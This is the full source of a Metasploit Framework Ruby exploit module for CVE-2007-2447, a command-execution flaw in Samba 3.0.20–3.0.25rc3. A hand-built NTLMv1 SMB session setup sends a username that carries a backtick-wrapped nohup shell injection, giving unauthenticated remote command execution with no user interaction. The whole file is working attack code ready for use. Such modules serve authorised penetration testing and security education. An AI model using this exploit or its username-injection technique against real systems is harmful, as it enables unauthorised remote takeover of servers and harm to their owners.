## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB # For our customized version of session_setup_ntlmv1 CONST = Rex::Proto::SMB::Constants CRYPT = Rex::Proto::SMB::Crypt def initialize(info = {}) super(update_info(info, 'Name' => 'Samba "username map script" Command Execution', 'Description' => %q{ This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2447' ], [ 'OSVDB', '34700' ], [ 'BID', '23972' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ], [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, # root or nobody user 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', # *_perl and *_ruby work if they are installed # mileage may vary from system to system.. } }, 'Targets' => [ [ "Automatic", { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 14 2007')) register_options( [ Opt::RPORT(139) ], self.class) end # Authenticate using NTLMv1 def session_setup_ntlmv1(user = '', pass = '', domain = '') raise XCEPT::NTLM1MissingChallenge if not self.simple.client.challenge_key if (pass.length == 65) hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.simple.client.challenge_key) hash_nt = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.simple.client.challenge_key) else hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.simple.client.challenge_key) : '' hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.simple.client.challenge_key) : '' end data = '' data << hash_lm data << hash_nt data << user + "\x00" data << domain + "\x00" data << self.simple.client.native_os + "\x00" data << self.simple.client.native_lm + "\x00" pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct self.simple.client.smb_defaults(pkt['Payload']['SMB']) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 pkt['Payload']['SMB'].v['WordCount'] = 13 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['MaxBuff'] = 0xffdf pkt['Payload'].v['MaxMPX'] = 2 pkt['Payload'].v['VCNum'] = 1 pkt['Payload'].v['PasswordLenLM'] = hash_lm.length pkt['Payload'].v['PasswordLenNT'] = hash_nt.length pkt['Payload'].v['Capabilities'] = 64 pkt['Payload'].v['SessionKey'] = self.simple.client.session_id pkt['Payload'].v['Payload'] = data self.simple.client.smb_send(pkt.to_s) # We don't care how the server responds, we should have a session already :) # And such is our leet customization. end def exploit connect # lol? username = "/=`nohup " + payload.encoded + "`" begin simple.client.negotiate(false) session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain']) rescue ::Timeout::Error, XCEPT::LoginError # nothing end handler end end